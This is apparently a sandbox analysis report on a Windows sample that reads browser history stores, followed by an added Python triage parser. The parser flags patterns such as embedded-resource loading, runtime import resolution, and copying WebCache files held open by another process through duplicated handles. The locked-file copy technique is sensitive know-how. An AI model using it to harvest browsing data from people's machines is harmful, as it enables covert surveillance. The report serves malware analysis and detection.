  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
• GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
• GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
Memory Dump Source
• Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
Similarity
• API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
• String ID:
• API String ID: 2941347001-0
APIs
• memset.MSVCRT ref: 00403C09
• memset.MSVCRT ref: 00403C1E
  • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
  • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
• wcscat.MSVCRT ref: 00403C47
  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
• wcscat.MSVCRT ref: 00403C70
Strings
Memory Dump Source
• Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
Similarity
• API ID: memsetwcscat$Closewcscpywcslen
• String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
• API String ID: 3249829328-1174173950
APIs
• memset.MSVCRT ref: 0040A824
• GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
• wcscpy.MSVCRT ref: 0040A854
• wcscat.MSVCRT ref: 0040A86A
• LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
• LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
Memory Dump Source
• Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
Similarity
• API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
• String ID:
• API String ID: 669240632-0
APIs
• wcschr.MSVCRT ref: 00414458
• _snwprintf.MSVCRT ref: 0041447D
• WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
• GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
Strings
Memory Dump Source
• Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
Similarity
• API ID: PrivateProfileString$Write_snwprintfwcschr
• String ID: "%s"
• API String ID: 1343145685-3297466227
APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
• GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
• GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
Strings
Memory Dump Source
• Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
Similarity
• API ID: AddressHandleModuleProcProcessTimes
• String ID: GetProcessTimes$kernel32.dll
• API String ID: 1714573020-3385500049
APIs
• memset.MSVCRT ref: 004087D6
  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
  • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
• memset.MSVCRT ref: 00408828
• memset.MSVCRT ref: 00408840
• memset.MSVCRT ref: 00408858
• memset.MSVCRT ref: 00408870
• memset.MSVCRT ref: 00408888
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
Memory Dump Source
• Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
Similarity
• API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
• String ID:
• API String ID: 2911713577-0
APIs
• memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
• memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
• memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
Strings
Memory Dump Source
• Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
Similarity
• API ID: memcmp
• String ID: @ $SQLite format 3
• API String ID: 1475443563-3708268960
APIs
  • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
• memset.MSVCRT ref: 00414C87
• RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
• wcscpy.MSVCRT ref: 00414CFC
  • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
Strings
• Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
Memory Dump Source
• Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
Similarity
• API ID: AddressCloseProcVersionmemsetwcscpy
• String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
• API String ID: 2705122986-2036018995
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _wcsicmpqsort
                                                                                                                                                • String ID: /nosort$/sort
                                                                                                                                                • API String ID: 1579243037-1578091866
                                                                                                                                                • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                                • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                                                                • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                                • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040E60F
                                                                                                                                                • memset.MSVCRT ref: 0040E629
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                Strings
                                                                                                                                                • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                                                                • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                                                                                                                • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                                                • API String ID: 3354267031-2114579845
                                                                                                                                                • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                                • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                                                                • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                                • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                                                                APIs
                                                                                                                                                • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                                                                • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3473537107-0
                                                                                                                                                • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                                                                • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??3@
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                                                                                • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset
                                                                                                                                                • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                                                • API String ID: 2221118986-1725073988
                                                                                                                                                • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                                                                • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                                                                APIs
                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??3@DeleteObject
                                                                                                                                                • String ID: r!A
                                                                                                                                                • API String ID: 1103273653-628097481
                                                                                                                                                • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                                • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                                                                                                • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                                                                                                • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                                                                                                APIs
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1033339047-0
                                                                                                                                                • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                                                                • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                                                                                                • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$memcmp
                                                                                                                                                • String ID: $$8
                                                                                                                                                • API String ID: 2808797137-435121686
                                                                                                                                                • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                                                                • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
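The plugin emits these records one function at a time, so the interesting cross-function pattern in this excerpt is easy to miss when reading them in order: the function whose resource chain is Find/Sizeof/Load/LockResource, the function that references WebCacheV01.dat and WebCacheV24.dat, the GetProcAddress/memcmp function, and the OpenProcess/DuplicateHandle/MapViewOfFile/WriteFile function listed further down. The following Python is an added example, not code from the Joe Sandbox report or its IDA plugin: it parses the `APIs`, `Strings` and `Similarity` blocks into one record per function and runs a few triage rules over them. The sample input is constructed from those four records on this page, with the leading whitespace and the dump-source and hash lines dropped. The rules, their thresholds (three or more GetProcAddress calls, the API sets that make up a chain) and all function names are my own choices, not anything the report states; `PROCESS_DUP_HANDLE = 0x0040` is the Win32 constant from winnt.h.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: four records copied from the report above, with the leading
# whitespace and the dump-source / hash lines dropped (they play no part in triage).
SAMPLE = r"""APIs
• FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
• SizeofResource.KERNEL32(?,00000000), ref: 004148D4
• LoadResource.KERNEL32(?,00000000), ref: 004148E4
• LockResource.KERNEL32(00000000), ref: 004148EF
Similarity
• API ID: Resource$FindLoadLockSizeof
• String ID:
APIs
• memset.MSVCRT ref: 0040E60F
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
Strings
• Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
• Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
Similarity
• API ID: memsetwcslen$AttributesFilewcscatwcscpy
APIs
  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
• memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
Similarity
• API ID: AddressProc$memcmp
• String ID: $$8
APIs
  • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
  • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
  • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
  • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
"""

API_RE = re.compile(r"^• (?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?(?P<name>[\w?@$]+)\.(?P<module>[A-Z0-9]+)"
                    r"(?:\((?P<args>[^)]*)\),)? ref: (?P<ref>[0-9A-F]{8})$")
STR_RE = re.compile(r"^• (?P<text>.*), xrefs: (?P<ref>[0-9A-F]{8})$")
SIM_KEYS = (("• API String ID:", "api_string_id"), ("• API ID:", "api_id"), ("• String ID:", "string_id"))

@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)     # (name, module, ref, args, subcall address or "")
    strings: list = field(default_factory=list)  # (text, xref)
    api_id: str = ""
    string_id: str = ""
    api_string_id: str = ""

def parse_records(text):
    """One FunctionRecord per APIs/Strings/Similarity block, in report order."""
    records, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in ("APIs", "Strings"):
            if cur is None or section == "similarity":  # the previous record is complete
                records.append(cur := FunctionRecord())
            section = line.lower()
        elif line == "Similarity":
            section = "similarity"
        elif cur is None or not line.startswith("•"):
            continue  # non-bullet headers such as "Memory Dump Source"
        elif section == "apis" and (m := API_RE.match(line)):
            cur.apis.append((m["name"], m["module"], m["ref"], m["args"] or "", m["sub"] or ""))
        elif section == "strings" and (m := STR_RE.match(line)):
            cur.strings.append((m["text"], m["ref"]))
        elif section == "similarity":
            for key, attr in SIM_KEYS:
                if line.startswith(key):
                    setattr(cur, attr, line[len(key):].strip())
                    break
    return records

RESOURCE_CHAIN = {"FindResourceW", "SizeofResource", "LoadResource", "LockResource"}   # rule set: my choice
LOCKED_FILE_COPY = {"OpenProcess", "DuplicateHandle", "MapViewOfFile", "WriteFile"}    # rule set: my choice
PROCESS_DUP_HANDLE = 0x0040  # winnt.h: the access right DuplicateHandle needs on the source process

def triage(rec):
    """Findings for one record; an empty list means no rule matched."""
    names = {name for name, *_ in rec.apis}
    out = []
    if RESOURCE_CHAIN <= names:
        out.append("Find/Sizeof/Load/LockResource chain: reads an embedded resource (payload or config)")
    if sum(name == "GetProcAddress" for name, *_ in rec.apis) >= 3:  # threshold is an assumption
        out.append("repeated GetProcAddress: imports resolved at runtime, recover the names being resolved")
    if LOCKED_FILE_COPY <= names:
        out.append("OpenProcess+DuplicateHandle+MapViewOfFile+WriteFile: copies a file another process holds open")
    for name, _module, ref, args, _sub in rec.apis:
        first = args.split(",")[0]  # desired-access argument, printed by the plugin as 8 hex digits
        if name == "OpenProcess" and re.fullmatch(r"[0-9A-F]{8}", first) and int(first, 16) & PROCESS_DUP_HANDLE:
            out.append(f"OpenProcess access {int(first, 16):#06x} includes PROCESS_DUP_HANDLE (ref {ref})")
    for text, xref in rec.strings:
        if "\\WebCache\\" in text:
            out.append(f"browsing-history store {text} referenced at {xref}")
    return out

def triage_report(text):
    """(record index, findings) for each record that triggered at least one rule."""
    return [(i, f) for i, r in enumerate(parse_records(text)) if (f := triage(r))]
```

`triage_report(SAMPLE)` flags all four records. The check worth keeping is the last one: the OpenProcess at 0040E093 is called with desired access 0x40, which is exactly PROCESS_DUP_HANDLE, and together with DuplicateHandle, CreateFileMappingW/MapViewOfFile and WriteFile that is the sequence used to copy a file that another process keeps open. WebCacheV01.dat, the IE and legacy Edge browsing-history database, is normally held open by the system, which is why a collector needs to go through another process's handle rather than CreateFile. The return address 0040E6A3 in the WriteFile and DeleteFileW argument lists lies just past the WebCache string references at 0040E647 and 0040E66F, which suggests, without proving it from this excerpt alone, that one function drives both the copy and the clean-up; confirm it in the disassembly before relying on it.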
                                                                                                                                                Strings
                                                                                                                                                • too many columns on %s, xrefs: 00430763
                                                                                                                                                • duplicate column name: %s, xrefs: 004307FE
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: duplicate column name: %s$too many columns on %s
                                                                                                                                                • API String ID: 0-1445880494
                                                                                                                                                • Opcode ID: d71f1f637ec18e5f8a62c501b2db333135d8de05f3daff8c641ff98159ef3fea
                                                                                                                                                • Instruction ID: 332525b9e829d337f3b342900587a6bcab00951879d739311f42b30c77ca79e1
                                                                                                                                                • Opcode Fuzzy Hash: d71f1f637ec18e5f8a62c501b2db333135d8de05f3daff8c641ff98159ef3fea
                                                                                                                                                • Instruction Fuzzy Hash: 5E314735500705AFCB109F55C891ABEB7B5EF88318F24815BE8969B342C738F841CB99
APIs
  • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
  • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
  • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
  • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
  • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
  • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
  • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
  • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
  • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
• CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
  • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
  • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
  • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E3EC
• DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
• CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
  • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
  • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
  • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
Memory Dump Source
• Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
Similarity
• API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
• String ID:
• API String ID: 1979745280-0
APIs
  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
• memset.MSVCRT ref: 00403A55
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
Strings
Memory Dump Source
• Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
Similarity
• API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
• String ID: history.dat$places.sqlite
• API String ID: 2641622041-467022611
APIs
  • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
  • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
• ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
• GetLastError.KERNEL32 ref: 00417627
